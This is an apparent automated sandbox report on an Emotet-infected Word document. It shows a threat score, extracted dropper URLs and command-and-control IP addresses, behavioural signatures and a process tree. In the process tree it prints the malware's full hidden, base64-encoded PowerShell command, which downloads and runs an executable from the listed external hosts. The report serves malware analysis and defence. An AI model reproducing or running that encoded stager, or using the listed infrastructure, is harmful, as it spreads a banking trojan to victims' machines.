Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    149s
  • resource
    win7v191014
  • submitted
    10-12-2019 18:05

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_ce0dbbcefdbfa0023395b5e11e31d2a2.70.doc

  • Sample

    191210-a4vmfsf3nn

  • SHA256

    ad99c5c6a1b25fb1aa7e3803d11623a74abb080990d3dfe1e684397b77b019af

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://bepeterson.futurismdemo.com/archive/y5o7/
exe.dropper

http://www.gnc.happenizedev.com/backup/n99uf/
exe.dropper

http://odoo-accounting.com/wp-includes/rest-api/search/R/
exe.dropper

http://monoclepetes.com/disneyworldclassroom/sy52j7/
exe.dropper

http://bakestories.com/0hikvh/Jm4QTsHwF/

Extracted

Family

emotet

C2

2.38.99.79:80

98.24.231.64:80

47.156.70.145:80

37.59.24.177:8080

66.34.201.20:7080

108.179.206.219:8080

45.56.88.91:443

206.189.112.148:8080

120.150.246.241:80

190.56.255.118:80

200.71.148.138:8080

192.241.255.77:8080

211.63.71.72:8080

190.53.135.159:21

183.102.238.69:465

108.191.2.72:80

107.170.24.125:8080

167.114.242.226:8080

91.73.197.90:80

178.209.71.63:8080
rsa_pubkey.plain

Signatures

  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Drops file in System32 directory 6 IoCs
  • Modifies registry class 136 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_ce0dbbcefdbfa0023395b5e11e31d2a2.70.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Drops file in System32 directory
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of FindShellTrayWindow
    PID:1064
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABHAHgAZgB5AGcAaQBmAGIAcgBjAGQAPQAnAFMAcQBwAGoAdAB1AHAAZAB1AHAAeAAnADsAJABVAHkAcABkAGwAZQBpAHMAaAB1AGcAIAA9ACAAJwAxADYAMgAnADsAJABCAGcAYgB3AHcAbABjAGIAagB2AGcAaQA9ACcATABjAHcAbQBjAHcAbABzACcAOwAkAFIAYwBkAHQAaABnAGEAZQBwAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFUAeQBwAGQAbABlAGkAcwBoAHUAZwArACcALgBlAHgAZQAnADsAJABCAG0AYgBuAGwAaQBoAHQAYwBuAGUAdQBxAD0AJwBPAG0AcgBoAHUAYwBrAGgAbAAnADsAJABGAGYAaQB2AGQAdQBxAGkAdgBrAHMAZgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAFQALgBXAGUAYgBjAGwASQBlAG4AdAA7ACQAUABhAGEAdABnAGUAagBhAHcAPQAnAGgAdAB0AHAAOgAvAC8AYgBlAHAAZQB0AGUAcgBzAG8AbgAuAGYAdQB0AHUAcgBpAHMAbQBkAGUAbQBvAC4AYwBvAG0ALwBhAHIAYwBoAGkAdgBlAC8AeQA1AG8ANwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGcAbgBjAC4AaABhAHAAcABlAG4AaQB6AGUAZABlAHYALgBjAG8AbQAvAGIAYQBjAGsAdQBwAC8AbgA5ADkAdQBmAC8AKgBoAHQAdABwADoALwAvAG8AZABvAG8ALQBhAGMAYwBvAHUAbgB0AGkAbgBnAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwByAGUAcwB0AC0AYQBwAGkALwBzAGUAYQByAGMAaAAvAFIALwAqAGgAdAB0AHAAOgAvAC8AbQBvAG4AbwBjAGwAZQBwAGUAdABlAHMALgBjAG8AbQAvAGQAaQBzAG4AZQB5AHcAbwByAGwAZABjAGwAYQBzAHMAcgBvAG8AbQAvAHMAeQA1ADIAagA3AC8AKgBoAHQAdABwADoALwAvAGIAYQBrAGUAcwB0AG8AcgBpAGUAcwAuAGMAbwBtAC8AMABoAGkAawB2AGgALwBKAG0ANABRAFQAcwBIAHcARgAvACcALgAiAFMAcABMAGAAaQBUACIAKAAnACoAJwApADsAJABTAGwAYgBpAGkAagBkAGMAdgBrAGsAcAA9ACcATgBtAGcAeQB6AHIAbABxACcAOwBmAG8AcgBlAGEAYwBoACgAJABJAG8AegByAG8AbgBuAGgAcQB5AGsAIABpAG4AIAAkAFAAYQBhAHQAZwBlAGoAYQB3ACkAewB0AHIAeQB7ACQARgBmAGkAdgBkAHUAcQBpAHYAawBzAGYALgAiAEQAYABvAHcAbgBgAEwATwBhAEQARgBJAEwARQAiACgAJABJAG8AegByAG8AbgBuAGgAcQB5AGsALAAgACQAUgBjAGQAdABoAGcAYQBlAHAAdQApADsAJABKAHUAawBpAHcAcQBlAHAAdgB0AHAAPQAnAFQAZgB1AHIAbwBrAHcAZQB4AGIAZwBnACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQAUgBjAGQAdABoAGcAYQBlAHAAdQApAC4AIgBMAGAAZQBOAGcAYABUAEgAIgAgAC0AZwBlACAAMwAyADAAMgA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABBAGAAUgB0ACIAKAAkAFIAYwBkAHQAaABnAGEAZQBwAHUAKQA7ACQATQBhAGcAYwBmAG8AeQBvAHkAdgA9ACcARwB1AHQAeABsAHIAdQBtACcAOwBiAHIAZQBhAGsAOwAkAFoAdwBmAGoAaQBtAHMAZQBiAD0AJwBWAGQAdQBtAG4AcgBlAHYAcQB3AHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBrAGQAZAB1AHAAdgBxAHEAPQAnAEsAdwB2AGYAbAB2AHQAdAAnAA==
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:564
    • C:\Users\Admin\162.exe
      "C:\Users\Admin\162.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      PID:1412
      • C:\Users\Admin\162.exe
        --fb74438b
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:324
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "170567490699066284820195978591905946548-1324181297-6827939461883015892416655494"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:756
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k WerSvcGroup
    1⤵
      PID:900
    • C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
      "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
      1⤵
        PID:1976
      • C:\Windows\SysWOW64\defsensor.exe
        "C:\Windows\SysWOW64\defsensor.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        PID:536
        • C:\Windows\SysWOW64\defsensor.exe
          --b48ef655
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Drops file in System32 directory
          • Suspicious use of SetWindowsHookEx
          • Executes dropped EXE
          • Suspicious behavior: EmotetMutantsSpam
          PID:1816

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/324-10-0x0000000000400000-0x000000000047C000-memory.dmp

        Filesize

        496KB

        Download

      • memory/324-9-0x0000000000240000-0x0000000000257000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1064-3-0x0000000006661000-0x0000000006665000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1064-0-0x0000000006540000-0x0000000006544000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1064-2-0x0000000009150000-0x0000000009154000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1064-1-0x0000000006661000-0x0000000006665000-memory.dmp

        Filesize

        16KB

        Download

      • memory/1412-6-0x00000000003E0000-0x00000000003F7000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1816-14-0x0000000000300000-0x0000000000317000-memory.dmp

        Filesize

        92KB

        Download

      • memory/1816-15-0x0000000000400000-0x000000000047C000-memory.dmp

        Filesize

        496KB

        Download